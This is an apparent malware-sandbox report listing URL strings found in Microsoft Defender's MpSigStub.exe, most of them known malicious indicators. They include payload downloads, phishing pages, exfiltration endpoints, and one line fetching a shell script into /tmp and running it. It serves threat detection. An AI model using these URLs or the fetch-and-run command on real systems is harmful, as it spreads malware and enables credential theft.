    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://fast-loads2.name/agreement.php
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://fast-loads2.name/agreement.phpxN
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://fateh.aba.ae/abc.zip
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://fateh.aba.ae/xyzx.zip
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://fbcores.info/
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&cid=
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://feed.helperbar.com
    Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmpString found in binary or memory: http://fei-coder.com/
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://feliz2008.land.ru/iexplore.exe
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://fellatioadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://fen0men.info/exp/index.php
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://festival23234.com/flash.php?mode=1
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://fgrss.com/?referrer=c3rob3jhdeblyxn0bwfulmnvbq==
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: http://fhayazilim.com/wp-admin/
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://fibrassolpiscinas.com.br/wp-content/upgrabe/
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpString found in binary or memory: http://file.sidetab.co.kr/dst/WallTab_
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://files.getpricefinder.com/install/ie/pricefinderpackage.zip
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpString found in binary or memory: http://finance.yahoo.com/
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: http://finanzen-netto.de
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://find.verycd.com/folders?cat=movie&kw=%s
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://finder.strangled.net/?pubid=
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://fineartconsult.be/gallery/index.php?email=
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://firefoxstabs.com/
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://firestweb.com/loja/social/1.jpg
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://firestweb.com/loja/social/2.jpg
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://firestweb.com/loja/social/3.jpg
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://flash.chinaren.com/ip/ip.php
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://flashupd.com/mp3/in
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://florida-pawn.com?
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmpString found in binary or memory: http://flow4.6299.cc/ClientAPI/flowtaskAPI.aspx
    Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmpString found in binary or memory: http://fmforums.com/wggx991264/
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://foo.w97.cn/SoftInterFace/SearchNum.aspx
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://foo.w97.cn/data/file/kwbuf.ini
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://forms.newlifeadmin.org
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://fortisdesigns.com/5ox6oyzzslcp
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: http://foundation.shanto-mariamfoundation.org/24.gif
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://foxxpriv.ru/pic1/index.php
    Source: MpSigStub.exe, 00000023.00000003.6267617568.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://frame.crazywinnings.com/scripts/protect.php?promo
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://freedomtonurse.net?
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://freeholdsurgical.net?
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://freeholdsurgical.org?
    Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmpString found in binary or memory: http://freeimagehost.ru/ubanner.png
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://freeunweb.pro/FreeUnWeb.exe
    Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmpString found in binary or memory: http://freevideoz.info/
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://freight.eu.com/download
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://fu.o3sb.com:9999/img.jpg
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpString found in binary or memory: http://funsiteshere.com/
    Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmpString found in binary or memory: http://funsiteshere.com/redir.php
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://futebolclubesantacruz.com.br/
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://futureweighed.ae.am/showthread.php?t=731756
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: http://g.delyemo.ru
    Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmpString found in binary or memory: http://g1.globo.com/Noticias/SaoPaulo/0
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://gahtt9j6.u8f3e5jq.ru
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://gaigoixxx.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: http://galinasergeeva.ru
    Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmpString found in binary or memory: http://galleries.payserve.com/1/31952/1
    Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmpString found in binary or memory: http://gallerydating.net
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://gallolitaadultmove.com/pc/page/set_reg.php?code=&cuid=
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://gameroominc.com/
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://games.enet.com.cn/article/SearchCategory.php?key=%s
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://garlic10.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
    Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmpString found in binary or memory: http://gathome.com/cgi-bin/first.pl
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://gd-sirve.com/rb.txt
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
    Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmpString found in binary or memory: http://ge.tt/api/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://geezybeatz.com/secured/index.html)
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://geocities.com/jobreee/main.htm
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://geocities.yahoo.com.br/youtoba03/listaaut.jpg
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpString found in binary or memory: http://get.file136desktop.info/DownloadManager/Get?p=638x
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://getfreez.net/multi-codec-pack.php
    Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmpString found in binary or memory: http://getmethere.ws
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://getp.jujutang.com
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://jobylive2.w22.haohaohost.cn/c/abbx/qqpost.asp
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpString found in binary or memory: http://joelosteel.gdn/eml/put.php
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: http://joelosteel.gdn/pi.php
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://johnnyslandscaping.org/over.php
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://josephioseph.com/htamandela.hta
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: http://joxi.ru/
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://jquerystatistics.org/update.js
    Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpString found in binary or memory: http://jqueryui.com
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://js.f4321y.com/
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://js.k0102.com/ad
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://js.mykings.pw:280/v.sctscrobj.dll
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://js.mys2018.xyz:280/v.sct
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmpString found in binary or memory: http://js.pkglayer.com
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmpString found in binary or memory: http://js.pkglayer.comx
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://jugnitv.com/final.jpg
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://juiillosks.sytes.net/
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://jump.qq.com/clienturl_
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://jump.qq.com/clienturl_100?clientuin=
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://jump.qq.com/clienturl_15
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://juntec.es/rechnung-18561/
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://justgaytgp.net/rd/out.php
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://jxmienphi.net/update/
    Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmpString found in binary or memory: http://jxvh.com/goto.php
    Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://jyhjyy.top
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://kanzlercompanies.com?
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpString found in binary or memory: http://kapper.st/info.txt
    Source: MpSigStub.exe, 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmpString found in binary or memory: http://karab.hopto.org/sarg.dot
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://karadyma.com/dhlpack/kfqakff/)
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://karafetdoll.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://kastarmgt.com?
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpString found in binary or memory: http://kastarqsr.com?
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://kavok.ind.br/ds/2312.gif
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
    Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmpString found in binary or memory: http://keeppure.cn/tool/xxz.exe
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://kemra.co.ke/bbaoh/
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://keramikadecor.com.ua/bdfg/excelzz/index.php
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpString found in binary or memory: http://keratomir.biz/get.php?partner=
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://keyba01se.usa.cc/ktg.doc
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://khaleejposts.com/rgk/m_rs/
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://king.connectioncdn.
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://kiranacorp.com/oja
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://kishi73.com.br/
    Source: MpSigStub.exe, 00000023.00000003.6268133446.0000028BD6E8E000.00000004.00000001.sdmpString found in binary or memory: http://kit.mastacash.com/
    Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmpString found in binary or memory: http://kle.austries
    Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmpString found in binary or memory: http://kokovs.cc/porno/stat.php
    Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpString found in binary or memory: http://kollaboration.intranet.stzh.ch/orga/asz-aszdokumentenbibliothek/Vorlagen/Makros/MakroMasterSt
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://kolo.crionn.com/kolo.php
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://kolyherqylwa9ru.top/log.php?f=400
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://korserver.com
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://kovpro.com
    Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmpString found in binary or memory: http://kp.9
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://kredytinksao.pl/raw.txt
    Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmpString found in binary or memory: http://kremlin-malwrhunterteam.info/scan.exe
    Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: http://krisrnilton.pl/mswiner.exe/payload-obfuscated-final.docx
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://ks.pcgames.com.cn/games_index.jsp?q=%s
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmpString found in binary or memory: http://ksn.a
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://ktr.freedynamicdns.org/backups/post.php
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://kubusse.ru/data
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://kungsb2africanbestfootballereverinkerso.duckdns.org/kung2doc/
    Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmpString found in binary or memory: http://kupeer.com/xd
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://kurs.ru/index
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://l1ke.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://lab.l4ever.cn/ip/api/
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://lapapahoster.com/safe_download/
    Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmpString found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://lavajatowi.sslblindado.com/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://lazexpo.info/
    Source: MpSigStub.exe, 00000023.00000003.6346352877.0000028BD65BA000.00000004.00000001.sdmpString found in binary or memory: http://ldjb.sriki.space/is/cact?i
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://ldvamlwhdpetnyn.ml/liverpool-fc-news/features/
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://led21.pro/wp-content/themes/betheme/images/headers/msg.jpg
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://lem18iuru03vwvqwt.xyz/ff.gif
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://lexandermagic.com/163-97-242097-905-163-97-242097-799/
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://lh.cjishu.com/index.php
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://lhx8z06.sed.nutritionservices.com
    Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://libre-templates.ddns.net/
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://librebooton.ddns.net/booton.dot
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://libya2020.com.ly/music.mp3
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://lifeandoil.myjino.ru/crg-bin/c/admin/adobe_pdf/adobe.html
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://lifehealthcareindia.com/google/google.php
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://lightday.pl/wp-content/themes/lightday/images/msg.jpg
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://line.largefamiliesonpurpose.com/
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://lineacount.info/cgi-bin/
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://linkurytest-bumbleb-stats-westeurope.cloudapp.netxi
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://linux.ghststr.com/lllol/0-o/tmp/s.sh&&cd/tmp/&&chmod777s.sh&&bashs.sh-o-2
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://lipostes.tk/98765.pdf
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://lithi.io/file/
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://livefrom.ge/modules/mod_swfobject/enfo.php
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://liveswindows.cyou/opzi0n1.dll
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://liveupdatesnet.com/
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://ll.protected.secured.adobe
    Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmpString found in binary or memory: http://lnk.direct/xzx
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://lnkiy.in/cloudfileshare
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://lo0oading.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://local45.net
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: http://localhost/st.php
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpString found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://localhost:62338/Chipsetsync.asmx
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://localhost:8000/cmd.exe
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://localstormwatch.com
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://localstormwatch.comx
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://log.dataurls.com/log/settings.json
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://log.dataurls.com/log/settings.jsonxN
    Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmpString found in binary or memory: http://log.newhybridhome.com/personal.dll
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://log.soomeng.com/wb/jdq/?mac=%s
    Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmpString found in binary or memory: http://logger.mobi
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://logins.kl.com.ua/2.msiequati/.native
